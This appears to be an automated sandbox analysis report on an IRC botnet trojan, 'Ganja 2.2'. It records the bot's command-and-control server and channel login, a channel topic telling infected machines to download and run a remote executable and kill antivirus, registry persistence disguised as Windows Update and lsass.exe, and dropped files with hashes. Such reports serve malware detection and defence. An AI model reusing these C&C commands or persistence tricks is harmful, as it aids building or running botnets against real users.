Remote Host                          Port Number
tep.xylocomod.com (66.96.240.101)    9009
NICK n{USA|XP}430851
USER 4308 "" "TsGh" :4308
JOIN ##kuwait## 112211
PRIVMSG ##kuwait## :New Infection! Ganja 2.2 Executed!
Now talking in ##kuwait##
Topic On: [ ##kuwait## ] [ !dl http://fagermoshreq.100free.com/win win.exe 1 | !av.kill | !clean ]
Topic By: [ X ]
Other details
* The following port was open in the system:
  Port   Protocol   Process
  1054   TCP        lsass.exe (%AppData%\lsass.exe)
Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = "%AppData%\lsass.exe"
    + UserFaultCheck = "%System%\dumprep 0 -u"
    so that lsass.exe runs every time Windows starts
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    + Taskman = "%AppData%\dpjk.exe"
    so that dpjk.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = "%AppData%\lsass.exe"
    so that lsass.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
  Process Name   Process Filename      Main Module Size
  lsass.exe      %AppData%\lsass.exe   61 440 bytes
* There were new memory pages created in the address space of the system process(es):
  Process Name   Process Filename      Allocated Size
  lsass.exe      %System%\lsass.exe    61 440 bytes
  lsass.exe      %System%\lsass.exe    61 440 bytes
  lsass.exe      %System%\lsass.exe    61 440 bytes
  lsass.exe      %System%\lsass.exe    61 440 bytes
File System Modifications
* The following files were created in the system:
  #   Filename(s)                            File Size       File Hash
  1   %AppData%\dpjk.exe                     204 800 bytes   MD5:   0x39EEF2D665B9D3FA7D123563A1FB731F
      [file and pathname of the sample #1]                   SHA-1: 0x7E9B1CCE17131929094E260388BE8F07C486686A
  2   %AppData%\lsass.exe                    118 784 bytes   MD5:   0x5A84024D9ED0965E3531E46C996EBD60
      %Temp%\8502.exe                                        SHA-1: 0xFA04D570CEE95AB89A8289986D49BE5FA110185E
  3   %Temp%\google2cache2.tmp               9 bytes         MD5:   0x6C936CB4A4B7F5803BD2E3DEACC3C2FE
      %Temp%\google_cache2.tmp                               SHA-1: 0x561782F6CC10BA3E5AFEAED752F95E589C813891